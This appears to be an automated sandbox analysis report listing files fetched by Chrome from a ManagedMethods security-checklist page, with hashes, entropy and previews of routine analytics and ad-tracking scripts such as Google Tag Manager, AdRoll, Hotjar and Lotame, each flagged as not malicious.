                                                                                                                                                                                                                                                                                                                                                                          Preview:var _hsp = window['_hsp'] = window['_hsp'] || [];._hsp.push(['setCookiePolicy', [{"portalId":6834707,"id":421619,"domain":null,"path":"/hubspot-analytics-default-policy","label":null,"enabled":true,"privacyPolicy":1,"privacyHideDecline":false,"privacyDefault":true,"privacyPolicyWording":"<p>This website uses cookies to collect information about how you interact with our website and allow us to remember you. We use this information in order to improve and customize your browsing experience and for analytics and metrics about our visitors both on this website and other media. To learn more, please see our <a href=\"https://managedmethods.com/privacy-policy/\" rel=\"nofollow\" target=\"_blank\">Privacy Policy</a>.</p>","privacyAcceptWording":"Accept","privacyDismissWording":"Decline","privacyDisclaimerWording":null,"privacyBannerAccentColor":"#3d7edb","privacyBannerType":"BOTTOM","cookiesByCategory":null,"targetedCountries":[],"showCloseButton":true}]]);._hsp.push(['addCookieDomain', '.ma
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):332108
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.604364178116607
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:ef4VV8OF1uiHO54gBB1xcQL1D1EgaCmQdZd5W:eQVnFgiuPtfG
                                                                                                                                                                                                                                                                                                                                                                          MD5:D2D9CDB081FDAE1C60DB186A0A92341F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0D596D0EADBFEA09CF3866EB807368CE64C50548
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:ABE8608BAE1EB33AC2DFE9DADEB43F84C28BF5C66CB6BDAF937224791ED20D88
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3F0D46BE68834437CF8313312B4996263CCC3DA2A8F125DB6C71281630E45B46214F37B081BBA310E1C7665A535692DCA0EE470E155983CBD3B3EB23C77C96CF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-KLDE7YGZXK&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":20,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":106},{"function":"__ogt_referral_exclusion","priority":20,"vtp_includeConditions":["list","client\\.upqode\\.com","hubspot","salesforce","preview\\.hs\\-sites\\.com","managedmethodsdev\\.com","managedmethods\\.wpenginepowered\\.com"],"tag_id":108},{"function":"__ogt_1p_data_v2","priority":20,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionTyp
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (666), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):666
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.233014973891215
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:haxVfMbnp22AwEojP2gdvINe7WOoAvmbRXu6TT7eR4VXHVc8KsOPhIG:haHMpVjPDdvLqWYlDT7eRYFc8KZhIG
                                                                                                                                                                                                                                                                                                                                                                          MD5:7DC96CB40B7B2A6B543499EBA3AE09AB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:71F534FA3FFF44D9569BF7BFACD2EFBD7765E3E3
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:89EE29A34AF8FDB2A7D8AC73DF7F5A32B09B5BC1003FFE3A4BA1CFE367448004
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2461A2C451FD334B9707783C41B89859E47924FC6E3C99FE82DD5B10B2FCEA00B7BE1E2A624AC983F9A8223E1901B91728A2ACEFE36F55BFA38C33A6B9DF26B4
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQ
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><meta charset="UTF-8"><script>const urlParams=new URLSearchParams(document.location.search),adv=urlParams.get("advertisable"),fpc=urlParams.get("adroll_fpc").split("-")[0],origin=document.location.origin;let url=origin+"/igs?advertisable="+adv+"&fpc="+fpc;function joinInterestGroups(e=null){let n=null!==e?"&cd_label="+e:"";var o=new XMLHttpRequest;o.responseType="json",o.open("GET",url+n,!0),o.onload=()=>{o.response.forEach((e=>{navigator.joinAdInterestGroup(e,2592e3)}))},o.send(null)}"cookieDeprecationLabel"in navigator?navigator.cookieDeprecationLabel.getValue().then(joinInterestGroups):joinInterestGroups()</script></head></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 2323
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1396
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.849278575881695
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:XmWD6QTBP7ub9mJov058Qc7KwqjhIWdG0FDikTxS5CXX4kc0gEjHOYRiUKIs/:XHDBBTubQs0OQcMvFJTxS5zQg70c
                                                                                                                                                                                                                                                                                                                                                                          MD5:945A34EB07F1F9C4CC44051E020E004D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:523A8592D238CAA761A0865C360B016B7538EDC2
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EA4EF58EF82300EEC79E3A77D3E432A50843CED9B592C642E74C34EB934D2C52
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FF3D9FE0B08B3083C46BF091D58E0412B1457473AC3B6255072CE1D12863D7202E0DC34FDDE5FA043C467064304240033C16D89B8AC38204D256908531D1E44B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pxdrop.lijit.com/1/d/t.dhj?cls=sync&dmn=ald.my.id&GDPR_v2=&us_privacy=&pubid=dt_scout&gpp=&gpp_sid=
                                                                                                                                                                                                                                                                                                                                                                          Preview:..........tV.s...W.>.#U....M...ir.L.vH.K.7#......-...7..Ko......Z...Of..Nm^j.....!.V.....Wh.D..{_'e.....4.M6*c..|.<..$fP..Pql-..B.J......U.tv:..i.u....Q..B...9.T..au....3Y......R..k.B..f...3-..."0.*d..'...'.<YZ...........:S.\..pI6.c.E...:5..........%p\.t.....Q.Z...yZ&x8).sG|.._+i.YT.,..1...p.1!..T9.4.?J+..f..5d;........^...l.[..<..&......'4.gem..y.._..m.S...|}d</...)..$R1Y...z....<..~.}...q...m..t.u.&.....c..c4........48X...We.8......3iN.L.X..![...v.Y.1......0..:4...3ph.g..tEL.....*.*.5.+.{.4...%.....i..D...5i.,..M.\.Ic6.;.(.2..]...?x..=~.\.....A.h....2..'...|.~......)..b...5..J-.-.......|....z.OVl..mLJ.e.n....*...y.`T.....|.o.s. -j@..e!.[.......&.y.c.c...........p}qh.'. .q" ..f...#.0t.q.....d..V@.h...).0~Z..5+.O.W.....z..X...gQ..g.._.~..E1>S?|~.....]...Im.{..<|.........E.79..{.~...oUm.b.Bo.....CP...a[...2..p."O..co..~s........Y..7~..gl..{....^..q;.....I\..lieA ....gM.n.....1y..#B%WE)..'i. .y..BY.q...6.w.......3..U..y.....8..x.R.....]
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4955), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4955
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.817511650655963
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUM8KF/LD:1DY0hf1bT47OIqWb118Kln
                                                                                                                                                                                                                                                                                                                                                                          MD5:AA5D28AA0573E3AD8F512AC9B59EA6CB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0DD145A091F159B2C2E037E208E4D2293DC36A6A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E8BD24DB57F6D38B677EC96EE86408537408814CAB5AF52E0BCB01A9C751F292
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0A1DB8E0A9D32F320F89F04FF4B2535099CBDE6A4E8068E69EB42C4259AECDAC24BD3C730630EBE3407DD1DF009B111C0B48DF418342270DDE13061C575DF04D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/927141988/?random=1728903365512&cv=11&fst=1728903365512&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&ref=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&hn=www.googleadservices.com&frm=0&tiba=Cloud%20App%20Security%20Checklist%20%7C%20Google%20%26%20Microsoft%20365%20Security&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (574)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):19456
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.368070514046372
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:QlRIR3d1518qUT2nq+ZMOF1JXCtRgyeiyMQ6gTHwufvzlpszzLX1pDox4prZPGOb:QyJ18qUCFXXHkgphEfX1Fox4BZuOp1dt
                                                                                                                                                                                                                                                                                                                                                                          MD5:3F62449B84EE9485831C4C1726CDDD3B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8211B1E0C4DFB4D3AD7EE8A53D02F12B9503B06A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3DB5FC063868D3CA5FC3CC2695F483266CFFEA00BEF68DFFD7E4944B947AACC8
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6ECEC6EC6AB4DF78BDA57C1873ED9B88B2CEBCBCDA730B5E2FDE6A68576798DA60A4006DD3E941A8CE0E48CE64236E1411C6435363BC420897E502B20ACE3977
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview://v185 Copyright (c) 2008-2023 33Across Inc. All Rights Reserved..Tynt=window.Tynt||[];.(function(){var d=window,m=document,h={distro:"AFWU",id:"AFWU-"+(new Date).getTime()};Tynt.AFWUL=!0;Date.now||(Date.now=function(){return(new Date).getTime()});var e={_maxRef:600,_idMacro:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",init:function(){this._icUrl=h.protocol+(Tynt.e||"")+"ic.tynt.com";this._debUrl=h.protocol+(Tynt.e||"")+"de.tynt.com/deb/v2";this._sicUrl=h.protocol+(Tynt.e||"")+"cdn-sic.33across.com/1/javascripts/sic.js";this._apUrl=h.protocol+(Tynt.e||"")+"cdn-ap.33across.com/javascripts/ap.js";.this._chmob=this._chua=this._chuav=this._chm=this._chpv=this._chp="";this.init.fbl=function(a,c){if(c)for(var g=0;g<c.length;++g)0<g&&(e[a]+=", "),e[a]+=c[g].brand+";v="+c[g].version};var a=navigator.userAgentData;"undefined"!=typeof a&&("undefined"!=typeof a.getHighEntropyValues&&(this._chpv="pending",a.getHighEntropyValues(["model","platformVersion","fullVersionList"]).then(function(a
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (11910)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13169
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.408862965326007
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:Ubneg5tmjHCR/UeHjXWb2pTOnBwatCpnNW+6JWCoD+TMm53Nj+:Ubne/jURHjXo20wwC6+6MD+Ym53Nj+
                                                                                                                                                                                                                                                                                                                                                                          MD5:B9C2C05AD2B7D9166E1EC52312C6D130
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CB190F8900BB29585274CF14C40B347C16782BCD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:341CC853F69B4A824F2AB4C7CBE8A59D30017DA377B6E83E74B39773EA247E83
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:48AF10EC9928D7C377EDFEC52DEBE1867D72DF45CA6B83F26A90D9B062BA52C1554227A74500C9B4382A2E443C19D3CDA459E7CE04D39EA6E490051A5D5D9BC5
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://static.hotjar.com/c/hotjar-1110137.js?sv=6
                                                                                                                                                                                                                                                                                                                                                                          Preview:window.hjSiteSettings = window.hjSiteSettings || {"site_id":1110137,"rec_value":1.0,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":false,"session_capture_console_consent":false,"anonymize_digits":false,"anonymize_emails":false,"suppress_all":false,"suppress_all_on_specific_pages":[],"suppress_text":false,"suppress_location":false,"user_attributes_enabled":false,"legal_name":"Managed Methods, Inc.","privacy_policy_url":"https://managedmethods.com/privacy-policy/","deferred_page_contents":[],"record_targeting_rules":[],"feedback_widgets":[],"heatmaps":[],"polls":[],"integrations":{"optimizely":{"tag_recordings":false},"abtasty":{"tag_recordings":false},"kissmetrics":{"send_user_id":false},"mixpanel":{"send_events":false},"unbounce":{"tag_recordings":false},"hubspot":{"enabled":true,"send_recordings":false,"send_surveys":true}},"features":["ask.popover_redesign","client_script.compression.pc","error_reporting","feedbac
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):332108
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.604363956114147
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:ef4VV8OF1uiLO54gBB1xcQL1D1EgaCmQdZd5W:eQVnFgiSPtfG
                                                                                                                                                                                                                                                                                                                                                                          MD5:82A57F112F8AEFA21477A5EA2645A6BC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4E5CB5665DA9C8F02162BFB7AE2E0CF82BE4555C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2D528A1FCF1F808435B5B42FCE86C37991197DF73AE1AF3AB8AC8D08B61670C0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2F392B01A0C435B7F70D92E762FD09D8C8D33521FEBAE90BFD4AA96E4433D448CDC63E4D93B49F964182A4828BFB65104826264228C8126626C965CFDC12BF75
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":20,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":106},{"function":"__ogt_referral_exclusion","priority":20,"vtp_includeConditions":["list","client\\.upqode\\.com","hubspot","salesforce","preview\\.hs\\-sites\\.com","managedmethodsdev\\.com","managedmethods\\.wpenginepowered\\.com"],"tag_id":108},{"function":"__ogt_1p_data_v2","priority":20,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionTyp
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (712)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3626
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.371235721791758
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:yM/7rUHUjU0WmkrALd6Ln6kOM/Ou4nMrMYXxCAfKslFyhwzw+xA5Lj98P8Rh7PN9:qHUjU0WlU8aAvk20+xAJdVJzX
                                                                                                                                                                                                                                                                                                                                                                          MD5:3CC67A5F12A1DA86A9760CB3854EE5D4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EA3845E1ED39855EF0E589BC3E5E74800D674860
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:27343EC4E1944D5B6145116EAEB711099464A96E0643EBB4A1CB5C9496548AFC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F9870F37AFCA3F47CC62C32F07B8C60B218A370E9A9BF036717F1F10302F98689C3B43C2FBC753748EFE85B9F652ABE69E7BB28D2C127ABCF16342AC0763436E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function () {. var scheme = (("https:" == document.location.protocol) ? "https" : "http");. var adnxs_domain = 'secure.adnxs.com';. var aol_domain = 'secure.leadback.advertising.com';. window.adroll_seg_eid = "J5ZZRODTFVDKLJ2GKXKSSA";. window.adroll_sendrolling_cross_device = true;. window.adroll_form_fields = {};. window.adroll_third_party_forms = {};. window.adroll_third_party_detected = {};. window.adroll_snippet_errors = [];. if (typeof __adroll._form_attach != 'undefined') {. __adroll._form_attach();. }. if (typeof __adroll._form_tp_attach != 'undefined') {. __adroll._form_tp_attach();. }. window.adroll_rule_type = "s";. var rule = ["87322457", "*get.managedmethods.com*"];. if (scheme=='http') { adnxs_domain = 'ib.adnxs.com'; aol_domain = 'leadback.advertising.com';}. var el = document.createElement("div");. el.style["width"] = "1px";. el.style["height"] = "1px";. el.style["display"] = "inline";. el.style["position"] = "absolute";. var content = '';..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):11
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:LUQ9:LUA
                                                                                                                                                                                                                                                                                                                                                                          MD5:825644F747BAAB2C00E420DBBC39E4B3
                                                                                                                                                                                                                                                                                                                                                                          SHA1:10588307553E766AB3C7D328D948DC6754893CEF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7C41B898C5DA0CFA4AA049B65EF50248BCE9A72D24BEF4C723786431921B75AA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BFE6E8DF36C78CBFD17BA9270C86860EE9B051B82594FB8F34A0ADF6A14E1596D2A9DCDC7EB6857101E1502AFF6FF515A36E8BA6C80DA327BC11831624A5DAEA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:Bad Request
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (43601), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43601
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.362094585622624
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:HiS1YxfHfIcITa4P5+23ex/BVQOXGsWIYTHpji7J:HioYxfyTaW5KVQpsEHpgJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:9B991FC4E41448221BE02744748EC589
                                                                                                                                                                                                                                                                                                                                                                          SHA1:47DF0B75614D17D1E94D61FC4006849EA8E1E13D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FFE8AC1AD574101276F7BA3BF6CFB95D55ACE8486BF60329ADBF843C64A2EBCE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FA4E263114DBC0BFE29FB7C1A39F7A0D36178D0BD6B6075B99D1183315F1FE6A23D1AB8ACC49710E2165D945135B5AEDC685A723F0DBC5C7E0F6EBE6E878DBDB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tags.crwdcntrl.net/lt/c/16311/sync.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== 'undefined' && typeof console.log !== 'undefined' && typeof document.createElement !== 'undefined' ); }; if(!lotameIsCompatible()){ if(console && console.error){ console.error('Lotame: This browser does not meet the minimum requirements.'); } } else { function sync16311_a(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function sync16311_b(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:sync16311_a(a)}}var sync16311_aa="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},sync16311_c; if("function"==typeof Object.setPrototypeOf)sync16311_c=Object.setPrototypeOf;else{var sync16311_d;a:{var sync16311_ba={Ua:!0}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                          MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (11910)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13169
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.408862965326007
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:Ubneg5tmjHCR/UeHjXWb2pTOnBwatCpnNW+6JWCoD+TMm53Nj+:Ubne/jURHjXo20wwC6+6MD+Ym53Nj+
                                                                                                                                                                                                                                                                                                                                                                          MD5:B9C2C05AD2B7D9166E1EC52312C6D130
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CB190F8900BB29585274CF14C40B347C16782BCD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:341CC853F69B4A824F2AB4C7CBE8A59D30017DA377B6E83E74B39773EA247E83
